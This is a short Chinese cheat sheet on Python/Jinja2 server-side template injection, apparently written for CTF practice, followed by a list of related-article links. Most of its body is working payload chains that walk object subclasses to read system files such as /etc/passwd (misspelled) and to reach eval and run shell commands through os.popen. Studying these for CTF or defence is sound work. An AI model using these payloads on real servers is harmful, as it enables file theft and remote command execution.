模板注入總結
1,常用命令
().__class__ 當前類
().__class__.__mro__ 當前類繼承了哪些類
().__class__.__mro__[-1].__subclasses__() object類的所有子類,具體就可以利用這個來找自己所需的類
比如有時第40為file函式,就可以通過
''.__class__.__mro__[-1].__subclasses__()[40]("/etc/password").read() 來進行讀取檔案內容
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__ 檢視子類列表中第59個這個下面的內建函式,找到所需的
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()") 找到合適的函式後,可以利用如上所示來進行利用
更多可以參考:
https://www.cnblogs.com/vstar-o/p/13719889.html
相關文章
- WPF 模板總結
- sql注入簡單總結SQL
- BUUCTF SSTI模板注入
- 模板注入&沙箱逃逸
- 線段樹模板總結
- .Net防sql注入的方法總結SQL
- XXE外部實體注入漏洞總結
- 關於FreeMarker模板注入
- 服務容器(自己總結)依賴注入依賴注入
- 前端模板引擎的實現總結前端
- Spring原始碼系列:依賴注入(四)-總結Spring原始碼依賴注入
- Android cmake命令總結以及指令碼模板Android指令碼
- CTF-flask模板注入學習Flask
- .Net Core中依賴注入服務使用總結依賴注入
- 工作總結ppt模板,瞭解一下!
- 流行的後臺管理系統模板總結
- 記一次堆疊注入拿shell的總結
- [WesternCTF2018]shrine(Jinja2模板注入)TF2
- halcon——缺陷檢測常用方法總結(模板匹配(定位)+差分)
- 服務端模板注入攻擊 (SSTI) 之淺析服務端
- ES6新特性總結之解構賦值和字串模板賦值字串
- 【模板】資料結構資料結構
- 模板 - 資料結構資料結構
- mssql 手工注入流程小結SQL
- 【總結】大學生寒假社會實踐-社群志願服務模板
- 藍橋杯演算法模板常用套路及API等個人總結演算法API
- javaSE總結(轉+總結)Java
- Html 結構標準模板HTML
- 【WPF】 問題總結-RaidButton修改樣式模板後作用區域的變化AI
- WordPress模板層次02:模板層次結構和原理
- 記一次攻防演練中的若依(thymeleaf 模板注入)getshell
- cve-2019-11581 Atlassian Jira未授權服務端模板注入漏洞服務端
- 1000篇影評總結梳理,整理出了一份影評模板,請查收!
- 「比賽總結」AT ABC 358 總結
- this總結
- 總結?
- 總結
- (C++模板程式設計):策略(policy)技術中的演算法策略與總結C++程式設計演算法